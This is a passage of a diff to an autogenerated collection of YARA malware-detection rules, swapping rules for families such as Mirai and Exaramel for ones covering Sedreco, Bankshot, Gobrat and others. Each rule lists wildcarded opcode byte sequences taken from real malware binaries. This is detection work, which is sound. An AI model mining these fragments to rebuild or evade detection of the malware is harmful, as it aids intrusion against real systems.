8b8de4feffff 8b95e0feffff 8b413c 03c6 8bb5dcfeffff } - $sequence_7 = { 83c408 85c0 750f c705????????03000000 e9???????? ffb5bcfaffff } - $sequence_8 = { eb23 8b9d2ce5ffff 8a02 8b0c9d60514100 } - $sequence_9 = { 83e31f c1e306 8b048560514100 0fbe441804 83e001 } + $sequence_0 = { 03d7 8bde f7de ffb544feffff 53 e8???????? c9 } + $sequence_1 = { 55 8bec 81c47cffffff 317588 f7d7 f7df } + $sequence_2 = { 23d0 f7d9 8bd6 23d8 } + $sequence_3 = { c20400 55 8bec 81c410ffffff } + $sequence_4 = { 55 8bec 81c45cffffff 23cb 8bd6 f7d2 } + $sequence_5 = { 314dd8 f7d9 48 f7d2 03c1 ffb504ffffff } + $sequence_6 = { 4a f7d9 23c6 8bcb 46 } + $sequence_7 = { 4f e8???????? 8bca 03f7 e8???????? 23d7 } + $sequence_8 = { 81856cffffff36360000 03df f7d1 8bf8 } + $sequence_9 = { 6a36 6a36 51 ffb550feffff 6834340000 57 8d4d88 } condition: - 7 of them and filesize <210944 + 7 of them and filesize <843776 } -rule MALPEDIA_Win_Asruex_Auto : FILE +rule MALPEDIA_Win_Anchor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "899abd0f-c835-5f70-819c-92570cc9b462" + id = "1c11ed2a-15a5-596e-9198-01902495df6c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.asruex_auto.yar#L1-L112" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anchor_auto.yar#L1-L193" license_url = "N/A" - logic_hash = "a14db0e4e44f1156fe16afe843345aa29b9b1f1eb3cc060b10e0bcdf06eb97d4" + logic_hash = "886cb58595403596c3f5d2209b3ab4ffe1064302e9312c9e2ca7e76025f4d7c9" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -178574,32 +181313,43 @@ rule MALPEDIA_Win_Asruex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 740e 85ed 740a } - $sequence_1 = { 7408 3c0d 7404 3c0a 7516 } - $sequence_2 = { 83f801 740e 83f803 7409 83f802 } - $sequence_3 = { ff15???????? 85c0 7407 3d14270000 } - $sequence_4 = { 740c 3c09 7408 3c0d 7404 3c0a 7516 } - $sequence_5 = { 7404 3c58 7505 bb01000000 } - $sequence_6 = { 3c09 7408 3c0d 7404 3c0a 7516 } - $sequence_7 = { 3c78 7404 3c58 7505 bb01000000 } - $sequence_8 = { 3c0d 7404 3c0a 7516 } - $sequence_9 = { e8???????? 83f8ff 7407 3d0000a000 } + $sequence_0 = { 740c 66c740016578 c6400365 eb0a } + $sequence_1 = { c6400365 eb0a 66c74001646c c640036c } + $sequence_2 = { 56 8d8dbcfeffff e8???????? 68???????? 8d8dbcfeffff } + $sequence_3 = { b101 e8???????? e8???????? 84c0 } + $sequence_4 = { 56 e8???????? 8b30 837e0c00 } + $sequence_5 = { 8b4638 5f 66894812 33c9 8b4638 } + $sequence_6 = { f2e965020000 e9???????? 53 56 57 } + $sequence_7 = { 0f90c1 f7d9 0bc8 51 e8???????? 8b0d???????? c1e102 } + $sequence_8 = { 0fb7c1 6641 66890d???????? 50 } + $sequence_9 = { 7509 33d2 33c9 e8???????? } + $sequence_10 = { 488d0d520b0400 e8???????? 488b8500010000 488b8d08010000 } + $sequence_11 = { 488d0d516d0200 e8???????? 488d8d680e0000 e8???????? } + $sequence_12 = { 488d0d50840200 e8???????? 488d0d48840200 e8???????? } + $sequence_13 = { 4903c7 c64405b079 4903c7 c64405b073 4903c7 c64405b074 4903c7 } + $sequence_14 = { 488d0d528a0300 e8???????? 488b8de0000000 e8???????? } + $sequence_15 = { 488b4318 66894802 8d4f6e 488b4318 66894804 } + $sequence_16 = { 488d0d52b90200 e8???????? e8???????? 48894508 } + $sequence_17 = { e8???????? 4c8d442468 48837d8010 4c0f43442468 } + $sequence_18 = { 488d0d50480300 e8???????? 90 488b8500010000 488da5e8000000 5f } + $sequence_19 = { 4889442428 488d85d0030000 4889442420 4c8d4c2448 } + $sequence_20 = { 488d0d52cd0300 e8???????? 90 488b8d00010000 } condition: - 7 of them and filesize <1564672 + 7 of them and filesize <778240 } -rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE +rule MALPEDIA_Win_Backbend_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6cb9e399-7a4a-5f81-aaa6-7cb702a29e01" + id = "0c0e6fe8-d4e7-5b73-ab9b-71a979b7c8b3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_013_korean_malware_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backbend_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "c008af161ea64c4cea7a6eccb5b08fe1a4b68cae21f50d0dd25e80b0eb93ad58" + logic_hash = "b7d55ae6e8faf28a826a20f0c2aeb325ce5a40ba350e055022c2b2475be4953d" score = 75 quality = 75 tags = "FILE" @@ -178613,32 +181363,32 @@ rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bd7 7cf5 7f04 3bc5 72ef } - $sequence_1 = { 57 a1???????? 33c4 50 8d842458060000 64a300000000 68???????? } - $sequence_2 = { 6800040000 8d4c241c 51 57 ffd5 85c0 743f } - $sequence_3 = { 81c40c040000 c3 8b2d???????? 8d44240c 50 } - $sequence_4 = { e8???????? 83c424 8bd8 8d542414 8d8c2454030000 } - $sequence_5 = { 8b44243c ff4c241c 3bf8 7605 e8???????? 8b44242c bb10000000 } - $sequence_6 = { 83c428 c3 3c03 0f8558ffffff 83f901 } - $sequence_7 = { 8d442414 50 c744242003000000 ff15???????? b902000000 } - $sequence_8 = { 68???????? 68???????? e8???????? 83c410 e8???????? b230 } - $sequence_9 = { 6a00 6a00 6a00 8bf2 6a00 6a00 8bf9 } + $sequence_0 = { ff15???????? 80a40500ffffff00 8d8500ffffff 56 50 ff15???????? } + $sequence_1 = { 58 5f 5e c3 ff25???????? ff25???????? } + $sequence_2 = { ffd6 ff7510 ffd3 8d8500feffff } + $sequence_3 = { ff15???????? 85c0 7416 8d8500fbffff } + $sequence_4 = { 56 e8???????? 8d8500fdffff 56 50 e8???????? 68???????? } + $sequence_5 = { 90 90 90 bf???????? 57 e8???????? c70424???????? } + $sequence_6 = { 8d8500f9ffff 50 e8???????? 8d8500f9ffff 50 e8???????? 83c424 } + $sequence_7 = { ffd3 8d8500feffff 6800010000 50 ff15???????? 8d8500feffff 68???????? } + $sequence_8 = { 56 ffd3 6a00 8d8500ffffff 56 50 ff15???????? } + $sequence_9 = { 7416 8d8500fbffff 6a00 50 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Lazardoor_Auto : FILE +rule MALPEDIA_Win_Mpkbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2eb37290-3e1c-5665-a83e-f5adb7297910" + id = "72738a74-041e-590e-bcbe-fef59ce6d7c8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lazardoor_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mpkbot_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "0bf4197e05236eb2be49432405132a9996b398c538e39f55b3ceea025a90e3ab" + logic_hash = "84a9c41e42e448fecfbe039fb747c3f04c473f008e3e19f5ee4ba318bc990491" score = 75 quality = 75 tags = "FILE" @@ -178652,34 +181402,34 @@ rule MALPEDIA_Win_Lazardoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488bd1 488bc1 48c1f806 4c8d05f4f60000 } - $sequence_1 = { 428a8c3998a50100 482bd0 8b42fc d3e8 443bc8 0f8d09010000 488b4b28 } - $sequence_2 = { 4053 4883ec20 488d05575a0100 488bd9 488901 f6c201 740a } - $sequence_3 = { 8905???????? 0f1105???????? 8b15???????? 4533c9 488b0d???????? 4533c0 } - $sequence_4 = { 4d85c0 7410 488d15615b0200 488bc8 } - $sequence_5 = { 44392d???????? 743d 4533c9 4c896c2430 c744242880000000 } - $sequence_6 = { 660f6e5cc610 660f62d8 660f6fc7 660f6cda 660ffec4 660f76de } - $sequence_7 = { 33d2 e8???????? 3bc3 7565 03fb 8b1d???????? 3bfb } - $sequence_8 = { ba5a540000 e9???????? 8b05???????? 85c0 } - $sequence_9 = { 4c8bc1 b84d5a0000 66390525b6ffff 7578 48630d58b6ffff 488d1515b6ffff 4803ca } + $sequence_0 = { 68???????? 50 ff15???????? a3???????? 8d45fc 50 683f000f00 } + $sequence_1 = { a3???????? 8d45fc 50 683f000f00 6a00 } + $sequence_2 = { 38450c 740a eb05 38450c 7503 } + $sequence_3 = { 8d55f8 52 56 6a20 68???????? } + $sequence_4 = { 55 8bec 56 57 6a00 ff15???????? 8bf0 } + $sequence_5 = { 0fb630 8975d4 db45d4 d84dc4 } + $sequence_6 = { 8bf0 0fb7450c 50 0fb74508 50 56 } + $sequence_7 = { 7507 38450c 740a eb05 } + $sequence_8 = { ff15???????? ff7508 a3???????? ffd0 5d c3 55 } + $sequence_9 = { ff15???????? ffd6 50 ffd7 } condition: - 7 of them and filesize <405504 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Exaramel_Auto : FILE +rule MALPEDIA_Win_Sedreco_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "55f2eda2-5892-5031-b695-0db68fb2d622" + id = "5e87e6b5-1a55-584a-943a-cd1c621a520c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.exaramel_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sedreco_auto.yar#L1-L450" license_url = "N/A" - logic_hash = "746a3a522250db31852461e3a3a31996745122c83c94633343076460de517b9c" + logic_hash = "480e943eac316911a45e26f995712fa56ee9e542b3cfeab42c526bed2d2dce35" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -178691,34 +181441,76 @@ rule MALPEDIA_Win_Exaramel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf0 85f6 7425 8d4e02 51 e8???????? 8b4d0c } - $sequence_1 = { 83c408 85c0 7834 ff750c ff7508 ff75fc } - $sequence_2 = { 3934bd60dd4100 7531 e8???????? 8904bd60dd4100 } - $sequence_3 = { 8be5 5d c3 81f903000080 7519 ff35???????? b8???????? } - $sequence_4 = { 7439 6aff 50 ff15???????? 85c0 7538 56 } - $sequence_5 = { 50 e8???????? ffb5f0fdffff e8???????? 83c414 8b4dfc } - $sequence_6 = { ffb5a4faffff ff15???????? 85c0 0f85c1feffff 33f6 } - $sequence_7 = { 5d c3 f68594f7ffff10 746d } - $sequence_8 = { 744b 817df4e8030000 b801000000 68f0030000 0f42f0 } - $sequence_9 = { c3 8b03 8d4dec 51 6800040000 } + $sequence_0 = { e8???????? 89450c 56 85c0 } + $sequence_1 = { c645ff30 e8???????? 85c0 7505 } + $sequence_2 = { 8bec 51 836d0804 53 } + $sequence_3 = { 836d0804 53 56 8b750c } + $sequence_4 = { 8b750c 56 e8???????? 6a08 } + $sequence_5 = { 50 68???????? 6a0d 68???????? } + $sequence_6 = { 51 6802020000 68???????? 50 } + $sequence_7 = { 7411 6a04 68???????? 68???????? } + $sequence_8 = { 7ce0 a1???????? 5e 85c0 } + $sequence_9 = { ff15???????? 83c604 81fe???????? 7ce0 } + $sequence_10 = { ffd6 8b0d???????? 898114010000 85c0 } + $sequence_11 = { ffd6 8b0d???????? 898198000000 85c0 } + $sequence_12 = { 56 be???????? 8b06 85c0 740f 50 } + $sequence_13 = { ffd6 8b0d???????? 894160 85c0 } + $sequence_14 = { ffd6 ffd0 a3???????? 5e 85c0 750a a1???????? } + $sequence_15 = { 6a01 68???????? ff35???????? ff15???????? ffd0 } + $sequence_16 = { 488b05???????? ff90e8000000 90 4883c420 } + $sequence_17 = { 68???????? e8???????? 8b35???????? 83c404 6a00 68???????? 6aff } + $sequence_18 = { 4889442420 41b906000200 4533c0 488b15???????? 48c7c101000080 488b05???????? ff9038010000 } + $sequence_19 = { 6800010000 6a00 68???????? e8???????? 6800020000 } + $sequence_20 = { ffd6 50 68???????? 6aff } + $sequence_21 = { 488b0d???????? 488b05???????? ff5010 85c0 } + $sequence_22 = { 50 68???????? 6aff 68???????? 6a00 6a00 ffd6 } + $sequence_23 = { 4883c428 c3 48890d???????? c3 48895c2410 4889742418 55 } + $sequence_24 = { 33d2 488d4c2450 488b05???????? ff90d8020000 } + $sequence_25 = { 4533c9 4533c0 ba000000c0 488b0d???????? 488b05???????? ff5040 } + $sequence_26 = { 448bc0 ba08000000 488b0d???????? ff15???????? 488905???????? } + $sequence_27 = { 488b0d???????? 488b05???????? ff5028 48c705????????00000000 } + $sequence_28 = { ffd6 8b4dfc 5f 5e 33cd b8???????? } + $sequence_29 = { 7cd5 68???????? e8???????? 8b4dfc 83c404 } + $sequence_30 = { 53 68???????? ff35???????? ffd6 ffd0 85c0 } + $sequence_31 = { e8???????? 8b8c2424020000 5b 33cc 33c0 e8???????? } + $sequence_32 = { 52 50 ff91f0000000 8bf0 } + $sequence_33 = { a1???????? 33c5 8945fc 6a0a 8d45f4 50 51 } + $sequence_34 = { 8d55f8 52 50 8b08 ff5124 } + $sequence_35 = { c20c00 6a02 ff74240c ff74240c e8???????? c20800 ff74240c } + $sequence_36 = { 57 50 ff512c 8bce } + $sequence_37 = { ff512c 8bf0 f7de 1bf6 46 } + $sequence_38 = { 8945fc 8b45f0 8945f4 8b45f4 } + $sequence_39 = { 50 8b08 ff9180000000 8b06 } + $sequence_40 = { ff512c 8bce 8bd8 e8???????? 57 } + $sequence_41 = { 57 c785ecfeffff01000000 c785e8feffffe197af54 0f6e85e8feffff 0f72f002 } + $sequence_42 = { 83ec24 53 56 57 c745dce197af54 } + $sequence_43 = { 8d443001 6a00 51 50 } + $sequence_44 = { 8d7901 8d4c2420 57 ff15???????? 84c0 } + $sequence_45 = { 6800040000 51 56 8974242c ff15???????? 85c0 0f8484010000 } + $sequence_46 = { 51 52 ff15???????? 8b442410 8b4e10 } + $sequence_47 = { a1???????? 8b00 8b4c2420 88440c18 } + $sequence_48 = { 85db 7548 fec8 53 b9???????? 8842ff } + $sequence_49 = { e8???????? 8a54240b 83c404 8b4c2430 895c2410 3bcb } + $sequence_50 = { 52 56 50 ff15???????? 6a01 } + $sequence_51 = { 8d442428 c684244010000001 8b11 8d4c2418 52 56 } condition: - 7 of them and filesize <294912 + 7 of them and filesize <1586176 } -rule MALPEDIA_Win_Polyvice_Auto : FILE +rule MALPEDIA_Elf_Gobrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f632496e-a2f4-5ede-b8be-18463e7a5bac" + id = "4556c50c-642d-5e08-a37f-0bca17aca318" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polyvice_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.gobrat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ed3286a18e97148fc13382a255519a25655dd929e966c75502c6a665bf5d62e5" - score = 75 - quality = 75 + logic_hash = "d983e645d32d0df64baf254a8f8a69a3323d191b1dd7ae64a36bbf4746335d3e" + score = 60 + quality = 35 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -178730,34 +181522,34 @@ rule MALPEDIA_Win_Polyvice_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4589cf 4131ed 41c1cf06 4501e5 4589fc 4589cf 41c1cf0b } - $sequence_1 = { c1c207 31d1 4489c2 c1ca02 01f1 89d6 } - $sequence_2 = { 448b442438 01d1 01c1 4489c2 4489c0 c1c807 } - $sequence_3 = { 4409f6 89f5 89c6 4421f6 4421e5 09f5 4489de } - $sequence_4 = { 4c8d150fc20000 4801de 4c8d0d05ca0000 4c8d05fec50000 4883c310 8b3b 89f9 } - $sequence_5 = { 66418949fe 89e9 d3e8 4d39cb 75e2 4889d8 4829f0 } - $sequence_6 = { e9???????? 488d4dcc 31f6 e8???????? 4c8d3531650000 4989c5 eb2d } - $sequence_7 = { 53 4881ec38030000 488dac2480000000 410fb7400c 410fb77840 450fb77822 668945bc } - $sequence_8 = { 450fb6ec bf20000000 c744242800000000 0fb7db 4531ff } - $sequence_9 = { 0fb7c9 0fb74c4b02 664183f802 7508 6683f902 410f44c3 450fb7ed } + $sequence_0 = { e8???????? 48833800 0f8f28020000 488b942428010000 4885d2 7508 e8???????? } + $sequence_1 = { 84c0 745c 488b542430 488b5a30 488b742428 488b4630 488b4e38 } + $sequence_2 = { c644242903 488d055aca3200 488d5c2418 e8???????? 4889c3 488d0546ca3200 e8???????? } + $sequence_3 = { eb41 488d059c311e00 e8???????? 48c740081c000000 488d0d39a62300 488908 31db } + $sequence_4 = { e8???????? 488b942460020000 488b7218 48897020 48837a7000 7542 488d1df7fc3200 } + $sequence_5 = { c3 31c0 488b6c2478 4883ec80 c3 488b8c2488000000 488b4110 } + $sequence_6 = { f7da 410fafd1 89d2 480fafd3 48c1ea2f 4489c6 41c1e008 } + $sequence_7 = { ffd2 b91a000000 4889c7 4889de 31c0 488d1dd7ce2d00 e8???????? } + $sequence_8 = { b825010000 e8???????? 4885c9 745d 4883f902 7712 753c } + $sequence_9 = { e8???????? 48c7400822000000 488d0de4212200 488908 31db 4889d9 488d3d244d2a00 } condition: - 7 of them and filesize <369664 + 7 of them and filesize <12853248 } -rule MALPEDIA_Win_Mirai_Auto : FILE +rule MALPEDIA_Win_Bankshot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "81ec826d-82b4-5432-816d-754db384603c" + id = "4fd3740f-7572-57c0-9152-6fcb3e7bee0c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mirai_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bankshot_auto.yar#L1-L425" license_url = "N/A" - logic_hash = "141eec0723c6032d1109e3ff4e6c77adfb4c0eb70a7f0ab199e555f3b3d9eb19" + logic_hash = "c9fc73e4e08c210def43b3c6eab22aa7333e3e000dbbe6d6d67c9182f6534613" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -178769,32 +181561,67 @@ rule MALPEDIA_Win_Mirai_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c408 85c0 7535 8b742408 50 68???????? } - $sequence_1 = { 8b8d48feffff e8???????? 8d4db0 e8???????? 8365fc00 83a578feffff00 8d8554feffff } - $sequence_2 = { e8???????? 83c40c 5d c3 8b5510 8b450c 8b4904 } - $sequence_3 = { 8bf3 c1ee18 334cb500 8b2d???????? 0fb6f2 334cb500 8b35???????? } - $sequence_4 = { 8bcd e8???????? 8bc8 e8???????? 8b10 8b12 6a5c } - $sequence_5 = { e8???????? 8b54244c 56 53 52 53 ff15???????? } - $sequence_6 = { c3 55 8bec 51 51 6a17 68???????? } - $sequence_7 = { c20400 55 8bec 83ec14 894df0 c745f401000000 837df400 } - $sequence_8 = { 8bbcbd00100000 81e70000ff00 33f7 0fb6fd 8bbcbd00100000 81e700ff0000 33f7 } - $sequence_9 = { e8???????? 8365f800 8b45fc c9 c3 55 8bec } + $sequence_0 = { 8bf8 8d5101 8a01 41 84c0 75f9 57 } + $sequence_1 = { 8bec 81ec48040000 a1???????? 33c5 8945f8 53 } + $sequence_2 = { e9???????? 57 33ff 8bcf 8bc7 894de4 3998c0e10110 } + $sequence_3 = { c74048b8e40110 8b4508 6689486c 8b4508 66898872010000 8b4508 83a04c03000000 } + $sequence_4 = { 33c9 33d2 66898c45f47fffff 8d8df47fffff 8d7102 668b01 83c102 } + $sequence_5 = { 89855c38ffff fec1 888d6438ffff 85fa 0f84a4000000 } + $sequence_6 = { 8b45fc 817848b8e40110 7409 ff7048 e8???????? } + $sequence_7 = { 0f84a6000000 680c400000 8d85e4bfffff 53 50 } + $sequence_8 = { 680c000200 e8???????? 8bf8 83c404 85ff 0f8429060000 6915????????04010000 } + $sequence_9 = { 83c40c 8d85bcbaffff 33f6 6828050000 56 50 } + $sequence_10 = { e8???????? 83c40c e8???????? 99 b907000000 } + $sequence_11 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d90c4e10110 } + $sequence_12 = { 0f1f4000 80b40d943dffffaa 41 3bca 7cf3 } + $sequence_13 = { c700???????? 8b4508 898850030000 8b4508 59 c74048b8e40110 } + $sequence_14 = { 50 e8???????? 83c40c 6b45e430 8945e0 8d80d0e10110 } + $sequence_15 = { 8b542420 8987d0000000 8b442424 898fd4000000 8917 } + $sequence_16 = { e8???????? 488d0de7030000 e8???????? 33c0 4883c420 } + $sequence_17 = { 488d0d1e960000 c705????????30000000 8bd8 c705????????02000000 48c705????????07000000 48893d???????? } + $sequence_18 = { 8b0c95c8887100 8844192e 8b0495c8887100 804c182d04 ff4604 eb08 } + $sequence_19 = { 51 ff15???????? 8bf0 83feff 89742410 7544 ff15???????? } + $sequence_20 = { ff15???????? 68???????? 57 8985bcfbffff } + $sequence_21 = { 48c744243002000080 e8???????? 488d8c2440020000 33d2 } + $sequence_22 = { 52 8d85c4fbffff 50 ff15???????? 8d8dd0fdffff } + $sequence_23 = { 57 83e502 4d ff15???????? 85f6 7407 } + $sequence_24 = { 8d1c85b4ef0110 33c0 f00fb10b 8b15???????? 83cfff 8bca } + $sequence_25 = { 7508 8b36 85f6 75e7 eb3a 81c694010000 } + $sequence_26 = { e9???????? 8d8df0feffff 51 8d95e8feffff } + $sequence_27 = { ff15???????? 8b8df8f3ffff c7410800000000 8b95f8f3ffff 837a0400 } + $sequence_28 = { 8dbc24de040000 668974245c f3ab 66ab } + $sequence_29 = { 85c9 0f85b5010000 488d8c2450030000 e8???????? e9???????? 498d4906 } + $sequence_30 = { ff15???????? 41b958000000 488d1558530000 458d41d6 } + $sequence_31 = { 8895affbffff 8b859cfbffff 8a8daffbffff 8808 8b9588fbffff } + $sequence_32 = { 8b15???????? 6a01 8d4c2414 6a04 51 8944241c } + $sequence_33 = { c1f906 6bc030 03048d80f10110 50 ff15???????? 5d } + $sequence_34 = { 33cc e8???????? 8be5 5d c20400 8b8c241c3c0000 83c8ff } + $sequence_35 = { 7531 e8???????? 8904bdc87f0110 85c0 7514 } + $sequence_36 = { 6a03 6a00 6a03 8d8424c0040000 68000000c0 50 ff15???????? } + $sequence_37 = { 33d2 488bc8 4889742448 ff15???????? 896c2460 8bdd } + $sequence_38 = { 488d9560040000 41b800400000 488bce 89442460 89442468 4889442420 ff15???????? } + $sequence_39 = { e8???????? 83c404 eb36 8d530c } + $sequence_40 = { 8d7201 8a0a 42 84c9 75f9 6a00 } + $sequence_41 = { 8815???????? 488d442438 488d353a490000 41b919000200 4533c0 48c7c102000080 } + $sequence_42 = { 6bd030 895de4 8b049dc87f0110 8945d4 8955e8 8a5c1029 80fb02 } + $sequence_43 = { 8b8544d4ffff 83c001 6689856cd4ffff 8a4d1c } + $sequence_44 = { 51 68???????? 8b4dfc e8???????? b801000000 8be5 } condition: - 7 of them and filesize <7086080 + 7 of them and filesize <860160 } -rule MALPEDIA_Win_Fct_Auto : FILE +rule MALPEDIA_Win_Miniblindingcan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b1f29a9-1362-5741-a18b-c3a100da706f" + id = "92bc3e0e-6544-5def-8326-ac0c583fd403" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fct_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miniblindingcan_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "d2be9c8f676646ff8bb82d16a11f73bdaff1325b5ad55ea7931b7cc2d022d940" + logic_hash = "7b8607880b97335be49c71c4d350efefeb788c1420c4ead3bd8ed006de1090db" score = 75 quality = 75 tags = "FILE" @@ -178808,34 +181635,34 @@ rule MALPEDIA_Win_Fct_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e801 0f8595010000 c745e438324100 e9???????? 894de0 c745e438324100 e9???????? } - $sequence_1 = { c3 c705????????80554100 b001 c3 68???????? e8???????? c70424???????? } - $sequence_2 = { e9???????? 8b1f 8d049d58634100 8b30 } - $sequence_3 = { 8bc6 83e03f 6bc838 894de0 8b049d50614100 f644082801 7469 } - $sequence_4 = { 6a04 e8???????? 83bd48fdffff08 8d8d34fdffff 8d45d8 } - $sequence_5 = { c70021000000 eb44 c745e002000000 c745e444324100 8b4508 8bcf 8b7510 } - $sequence_6 = { 50 8b04bd50614100 ff743018 ff15???????? 85c0 7404 b001 } - $sequence_7 = { 56 33f6 8b8650614100 85c0 740e 50 e8???????? } - $sequence_8 = { 660fd60f 8d7f08 8b048d84514000 ffe0 f7c703000000 7413 } - $sequence_9 = { 68???????? c68524fdffff00 8d4dd8 ffb524fdffff 6a01 e8???????? } + $sequence_0 = { 899424b0000000 81faff000000 7c37 b881808080 488bce f7e2 c1ea07 } + $sequence_1 = { 8bc6 45338c8c600a0200 c1e808 c1eb08 41c1ea10 0fb6c8 410fb6c0 } + $sequence_2 = { 48ffc1 49ffc8 75ed 488b542428 4c8d442420 488bce e8???????? } + $sequence_3 = { 660f6e7310 488d4c2438 f30fe6f6 ff15???????? 488d542430 488d4c2438 ff15???????? } + $sequence_4 = { 483b442420 0f8710040000 4883fd0f 0f82e7030000 488d7df1 c606f0 } + $sequence_5 = { 488d0579340000 488905???????? e9???????? 81fb39380000 7513 488d0553340000 488905???????? } + $sequence_6 = { 48ffc6 448bc1 f7e1 c1ea07 4c89442430 8bc2 } + $sequence_7 = { 488bc8 ff15???????? 488d1528a70000 488bce 488905???????? ff15???????? 488bc8 } + $sequence_8 = { 488b4590 83a0c8000000fd 83c8ff e9???????? 4183cfff f6431840 4c8d0dc50dffff } + $sequence_9 = { 740a b801000000 e9???????? 4533c9 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <453632 } -rule MALPEDIA_Win_Hyperssl_Auto : FILE +rule MALPEDIA_Win_Enfal_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b769147-d4c5-504a-a0e4-deff8d9a685b" + id = "7c648ee2-e4dd-541c-9b47-28a132a1416c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hyperssl_auto.yar#L1-L217" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.enfal_auto.yar#L1-L112" license_url = "N/A" - logic_hash = "f5cbe0c98412e251badcd68fd5914804f5830187a82b3a89143d596e8e3b1b20" + logic_hash = "4106f1f3c4e35436925009af22c1e6b23f6200a61794638682b09644acc42fa2" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -178847,46 +181674,32 @@ rule 